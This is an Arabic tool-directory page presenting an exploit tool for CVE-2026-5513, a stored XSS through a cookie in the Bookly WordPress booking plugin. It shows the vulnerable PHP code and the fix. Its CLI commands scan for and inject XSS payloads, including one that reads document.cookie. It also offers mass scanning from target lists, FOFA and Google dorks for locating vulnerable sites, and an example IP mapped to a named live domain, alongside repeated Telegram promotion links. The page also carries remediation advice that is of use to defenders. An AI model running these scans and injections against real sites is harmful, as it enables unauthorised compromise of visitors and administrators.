Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/87achrafg-stack/cve-2026-5513
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHub87achrafg-stack/cve-2026-5513

CVE-2026-5513

CVE-2026-5513 — Bookly ≤ 27.2 Stored XSS عبر Cookie

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-5513 https://t.me/FreeToolsCpa

CVE-2026-5513 — Bookly ≤ 27.2 ثغرة XSS مخزّنة عبر ملف تعريف الارتباط CVE-2026-5513 — Bookly ≤ 27.2 ثغرة XSS مخزّنة عبر ملف تعريف الارتباط CVE CVSS النوع المصادقة https://t.me/FreeToolsCpa ملف CVE في المجموعة
نظرة عامة الحقل القيمة CVE ID CVE-2026-5513 الثغرة ثغرة تخزين XSS (XSS) البرنامج المساعد Bookly — نظام حجز المواعيد عبر الإنترنت المتأثر ≤ 27.2 الإصلاح 27.3+ CVSS 3.1 7.2 (عالية) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N CWE CWE-79 المصادقة مطلوبة لا شيء المتطلب المسبق يجب تفعيل خيار "تذكر المعلومات الشخصية في ملفات تعريف الارتباط" (معطل افتراضيًا) الوصف برنامج Bookly لـ WordPress عرضة لثغرة تخزين XSS عبر ملف تعريف الارتباط bookly-customer-full-name في الإصدارات حتى 27.2 وذلك بسبب عدم كفاية تنقية المدخلات والهروب من المخرجات.

عند تفعيل إعداد "تذكر المعلومات الشخصية في ملفات تعريف الارتباط"، يقرأ البرنامج قيمة ملف تعريف الارتباط bookly-customer-full-name ويعرضها مباشرةً في HTML نموذج الحجز دون هروب مناسب. يمكن لمهاجم غير مصادق حقن حمولات JavaScript عشوائية عبر ملف تعريف الارتباط هذا، والتي يتم تنفيذها عندما يزور أي مستخدم (بما في ذلك المسؤولين) صفحة تحتوي على نموذج الحجز الخاص بـ Bookly.

سير الهجوم مهاجم → تعيين ملف تعريف ارتباط ضار (bookly-customer-full-name=) → زيارة صفحة تحتوي على نموذج حجز Bookly → يقرأ البرنامج ملف تعريف الارتباط ويعرض القيمة دون هروب → يتم تنفيذ حمولة XSS في سياق متصفح الضحية السبب الجذري

root@kitploit:~
// VULNERABLE — Bookly ≤ 27.2
$full_name = $_COOKIE['bookly-customer-full-name'];  // No sanitization
echo '<input type="text" value="' . $full_name . '" />';  // No escaping
// PATCHED — Bookly 27.3+
$full_name = sanitize_text_field($_COOKIE['bookly-customer-full-name']);
echo '<input type="text" value="' . esc_attr($full_name) . '" />';

الميزات ✓ استقصاء تلقائي لعناوين IP/النطاقات (HTTP/HTTPS، المنافذ الشائعة، كشف إعادة التوجيه) ✓ كشف البرنامج الإضافي Bookly و WordPress مع فحص الإصدار ✓ كشف إعداد ملفات تعريف الارتباط (تحليل BooklyL10n JS + انعكاس canary) ✓ اختبار XSS متعدد السياقات (HTML، JavaScript، حقن السمات) ✓ حقن الحمولة مع التحقق من الانعكاس ✓ هدف واحد أو مسح جماعي من ملف ✓ مسح متعدد الخيوط (حتى 20 خيط) ✓ دعم البروكسي (Burp، إلخ) ✓ حفظ تلقائي للنتائج الضعيفة ✓ قائمة تفاعلية + وضع CLI التثبيت

root@kitploit:~
pip install requests colorama

الاستخدام وضع CLI

root@kitploit:~
# فحص هدف واحد
python CVE-2026-5513.py -u https://target.com -v

# فحص عنوان IP واحد (استقصاء تلقائي للمنافذ + إعادة التوجيه)
python CVE-2026-5513.py -u 167.99.0.203 -v

# فحص + حقن حمولة XSS
python CVE-2026-5513.py -u https://target.com --inject -v

# حمولة XSS مخصصة
python CVE-2026-5513.py -u https://target.com --inject --payload "<svg onload=alert(document.cookie)>"

# مسح جماعي من ملف
python CVE-2026-5513.py -l targets.txt -t 20 -o vuln.txt

# مع بروكسي Burp
python CVE-2026-5513.py -u https://target.com -v --proxy http://127.0.0.1:8080

الوضع التفاعلي

root@kitploit:~
python CVE-2026-5513.py

الخيارات العلم الوصف -u URL هدف واحد (URL، نطاق، أو IP) -l FILE ملف يحتوي على قائمة الأهداف (هدف لكل سطر) --inject حقن حمولة XSS (الافتراضي: الفحص فقط) --payload STR حمولة XSS مخصصة -t N عدد الخيوط (الافتراضي: 10، الحد الأقصى: 20) --proxy URL بروكسي HTTP (مثال: http://127.0.0.1:8080) -o FILE حفظ النتائج في ملف -v إخراج مفصل صيغ الهدف تقبل الأداة أيًا من هذه الصيغ في -u أو في ملف قائمة الأهداف:

https://example.com http://example.com example.com 192.168.1.100 192.168.1.100:8080 بالنسبة لعناوين IP المجردة، تقوم الأداة تلقائيًا بـ:

استقصاء المنافذ 443، 80، 8443، 8080 كشف إعادة التوجيه HTTP → HTTPS كشف إعادة التوجيه IP → نطاق (مثال: 167.99.0.203 → https://book.repairrite.com) مسح الدلائل الفرعية لـ WordPress (/wp/, /blog/, /wordpress/, إلخ) سلسلة الاستغلال الخطوة 0 → استقصاء الهدف (IP/نطاق → حل عنوان URL الأساسي، كشف إعادة التوجيه) الخطوة 1 → كشف البرنامج الإضافي Bookly (readme.txt، مسار البرنامج، الأصول، فحص الإصدار) الخطوة 2 → فحص إعداد ملفات تعريف الارتباط (تحليل BooklyL10n JS + اختبار انعكاس canary) الخطوة 3 → اختبار انعكاس XSS (سياق HTML، سياق JS، سياق السمات) الخطوة 4 → حقن الحمولة (إذا كان وضع --inject، تحقق من الانعكاس) جوجل دوركس

FOFA

body="bookly-responsive-appointment-booking-tool" body="bookly-customer-full-name" body="bookly-form-group" && body="wp-content/plugins/bookly"

Google

inurl:"/wp-content/plugins/bookly-responsive-appointment-booking-tool/readme.txt" intitle:"Book Appointment" inurl:"booking" intext:"bookly" المعالجة الأولوية الإجراء 🔴 تحديث Bookly إلى الإصدار 27.3+ 🟡 تعطيل "تذكر المعلومات الشخصية في ملفات تعريف الارتباط" في إعدادات Bookly → عام 🟢 نشر قواعد WAF لتصفية XSS في قيم ملفات تعريف الارتباط 🟢 تنفيذ رؤوس سياسة أمان المحتوى (CSP) المراجع NVD — CVE-2026-5513 إشعار Wordfence Tenable سجل التغييرات Bookly إخلاء المسؤولية هذه الأداة مقدمة لأغراض الاختبار الأمني المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احصل دائمًا على التصريح المناسب قبل الاختبار. المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة. https://t.me/FreeToolsCpa https://t.me/FreeToolsCpa https://t.me/FreeToolsCpa

تنزيل الأداة